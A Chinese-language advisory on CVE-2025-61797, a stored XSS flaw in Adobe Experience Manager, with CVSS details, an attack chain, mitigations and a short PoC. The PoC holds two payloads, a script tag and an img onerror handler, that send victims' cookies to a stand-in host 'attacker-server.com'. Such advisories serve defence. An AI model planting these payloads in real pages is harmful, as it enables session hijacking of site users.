CVE-2025-61797：Adobe Experience Manager存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-61797

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager (AEM)

漏洞概述

CVE-2025-61797是Adobe Experience Manager（AEM）11.6及更早版本中存在的一个存储型跨站脚本（Stored XSS）安全漏洞。该漏洞由Adobe产品安全事件响应团队（[email protected]）发现，并于2025年10月14日正式披露。根据CVSS 3.1评分标准，该漏洞获得5.4分，属于中危级别。

该漏洞的核心问题在于AEM的某些表单字段未能对用户输入进行充分的过滤和转义处理，导致低权限攻击者可以将恶意的JavaScript代码注入到这些易受攻击的表单字段中。由于是存储型XSS，恶意脚本会被持久化保存在服务器端，当其他用户（受害者）访问包含该恶意字段的页面时，注入的脚本将在受害者浏览器中自动执行。

该漏洞的攻击向量为网络（AV:N），攻击复杂度低（AC:L），但需要低权限认证（PR:L）和用户交互（UI:R）。漏洞的影响范围已改变（S:C），表明被攻陷的组件会影响其他安全域。虽然机密性和完整性影响均为低，但可用性不受影响。该漏洞的利用需要受害者打开一个精心构造的恶意链接，这增加了攻击的复杂性。

技术细节

该存储型XSS漏洞存在于Adobe Experience Manager 11.6及更早版本中。其技术原理如下：

1. **输入验证缺陷**：AEM的某些表单字段在接收用户输入时，未能正确地对HTML特殊字符（如<、>、&、"、'等）进行转义或过滤，允许攻击者提交包含恶意JavaScript代码的输入。

2. **持久化存储**：由于是存储型XSS，恶意脚本被提交后会保存在AEM的数据库或内容存储中，作为正常页面内容的一部分存在。

3. **执行机制**：当受害者浏览包含该恶意字段的页面时，服务器返回的页面中包含未转义的用户输入，浏览器将其解析为可执行脚本并执行。

4. **利用条件**：攻击者需要具备低权限账户（PR:L），这意味着未授权用户无法直接利用此漏洞。攻击者首先需要通过合法途径获取一个低权限账户，然后利用表单字段注入恶意代码。

5. **攻击触发**：攻击者将包含恶意脚本的链接发送给受害者，当受害者点击该链接并访问受影响的页面时，恶意脚本将在其浏览器上下文中执行，可能窃取会话cookie、进行钓鱼攻击或执行其他恶意操作。

6. **影响范围扩大**：由于CVSS向量中标注S:C（Scope Changed），被攻陷的组件（如AEM）中的漏洞可能影响到其他安全域，扩大了攻击的危害程度。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者通过合法途径（如注册、社交工程或购买）获取Adobe Experience Manager的低权限用户账户。

STEP 2

步骤2：识别易受攻击的表单字段

攻击者浏览AEM的各个功能页面，识别未对输入进行充分过滤和转义的表单字段，如文本输入框、富文本编辑器或评论字段。

STEP 3

步骤3：注入恶意脚本

攻击者在易受攻击的表单字段中输入包含恶意JavaScript代码的payload，如窃取cookie、伪造请求或重定向用户等。

STEP 4

步骤4：恶意脚本持久化存储

恶意脚本作为页面内容的一部分被存储在AEM服务器端的数据库中，成为存储型XSS攻击载荷。

STEP 5

步骤5：构造恶意链接并诱导受害者访问

攻击者将包含恶意内容的页面链接通过邮件、即时通讯或其他社交工程手段发送给目标受害者。

STEP 6

步骤6：受害者访问页面，脚本执行

当受害者点击链接并访问包含恶意脚本的页面时，浏览器解析并执行注入的JavaScript代码，攻击者可以窃取会话凭证、进行钓鱼攻击或执行其他恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-61797: Adobe Experience Manager Stored XSS PoC -->
<!-- This PoC demonstrates a stored XSS attack via vulnerable form fields in AEM 11.6 and earlier -->

<!-- Step 1: Attacker logs in with low-privilege account -->
<!-- Step 2: Attacker navigates to a vulnerable form field (e.g., a text input, rich text editor, or comment field) -->
<!-- Step 3: Attacker injects the following malicious payload into the form field: -->

<script>
    // Steal session cookie and exfiltrate to attacker-controlled server
    var cookie = document.cookie;
    var img = new Image();
    img.src = "https://attacker-server.com/steal?cookie=" + encodeURIComponent(cookie);
    
    // Alternatively, perform actions on behalf of the victim
    // fetch('/api/some-action', { method: 'POST', body: 'malicious=data' });
</script>

<!-- Alternative payload using event handlers (may bypass some filters): -->
<img src=x onerror="fetch('https://attacker-server.com/steal?cookie='+document.cookie)">

<!-- Step 4: The malicious script is stored in AEM's backend -->
<!-- Step 5: Attacker crafts a malicious link and sends it to the victim: -->
<!-- https://victim-aem-instance.com/content/vulnerable-page.html -->

<!-- Step 6: When victim visits the page, the stored script executes in their browser context -->

<!-- Mitigation in code: Always sanitize user input using HTML encoding -->
<!-- Example fix (server-side): -->
<!-- StringEscapeUtils.escapeHtml4(userInput) for Java-based AEM components -->

影响范围

Adobe Experience Manager <= 11.6

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）对所有用户输入实施严格的输入验证，拒绝包含HTML标签和JavaScript代码的输入；2）对输出内容进行HTML实体编码，确保用户输入在页面中以纯文本形式显示；3）部署内容安全策略（CSP）头，限制内联脚本执行；4）为所有敏感cookie设置HttpOnly属性，防止XSS攻击窃取会话；5）监控异常的用户输入和页面访问行为，及时发现潜在的XSS攻击；6）限制低权限用户访问和修改表单字段的权限；7）使用Web应用防火墙（WAF）规则过滤常见的XSS payload。